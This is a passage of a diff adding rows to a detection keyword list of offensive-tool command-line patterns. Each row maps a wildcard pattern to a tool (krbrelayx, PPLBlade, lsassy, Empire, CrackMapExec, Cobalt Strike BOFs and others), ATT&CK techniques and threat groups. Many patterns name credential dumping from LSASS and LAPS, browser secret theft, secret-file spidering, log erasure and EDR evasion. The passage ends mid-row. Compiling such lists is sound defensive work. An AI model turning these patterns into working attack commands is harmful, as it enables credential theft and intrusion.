+"* --dump-gmsa*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"* --dumpmode network --network raw --ip * --port *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"* --dumpmode network --network smb *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"* --dumpname lsass.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"* duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"* eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"* edge logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"* edge masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for 
Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"* edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
+"* EfsPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"* Egress-Assess's FTP server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z"
+"* empire.arguments*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 
T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* empire.client.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - 
Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* empire.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* -enabled -u * -p * -old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
+"* enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"* enum -passive -d *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"* epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* EternalHushCore *","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"* etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* EtwHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"* -eval *caplets.update* ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"* evil.corp *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits 
containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* EvilClippyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* exclusion.c /Fodefender.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 